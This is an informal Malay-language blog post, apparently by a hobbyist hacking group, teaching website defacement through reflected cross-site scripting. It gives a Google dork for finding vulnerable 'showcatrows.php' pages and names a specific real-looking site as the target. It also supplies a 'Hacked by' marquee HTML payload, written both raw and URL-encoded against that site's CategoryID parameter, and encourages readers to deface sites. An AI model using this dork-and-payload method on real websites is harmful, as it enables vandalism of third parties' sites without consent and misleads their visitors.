Deface Website Kaedah XSS Vulnerability

Posted by Unknown - -



Okey Tpi aq dah ajar SqlScan kn... :) okey Class yg kedua aku akan ajar ko orng XSS Vulnerability.. thu tahu XSS Vulnerability..?? 
XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client.. (Y)
okey kite mula kn class ye...

step1 : masuk kn dork ni kedalam google..

Dork : inurl:"/showcatrows.php?CategoryID="

step2 : lepas ko orng dah masuk kn dork kat dlm google pilih je site yg korng nk.. contoh mcm aq aq pilih site ni..http://www.examsolutions.net/maths-revision-papers/showcatrows.php?CategoryID=13

step3: lepas ko orng dapat site tu.. ko orng masuk kn scritpt HTML kat belakang URL web itu..
Script HTML : ><marquee><h1> Hacked by Khery code
newbie </h1></marquee>


contoh : http://www.examsolutions.net/maths-revision-papers/showcatrows.php?CategoryID=13%3E%3Cmarquee%3E%3Ch1%3E+Hacked+by+khery+codenewbie+%3C%2Fh1%3E%3C%2Fmarquee%3E

klau ko orng pndai cari mungkin korng boleh depes satu site die.. ;)
HASIL <-- clik
tpi yang ni x abis depes ar.. wkwkwkkw :v

sekian sja dari aq utuk semua semoga ko orng semua paham ape yg aku ajar.. x pahan tanye insya'allah klau aq free aq reply.. ;)
okey ar smpai kat sni je.. assalammualaikum..

thnks to : all mmber Code Newbie and Single Attacker Crew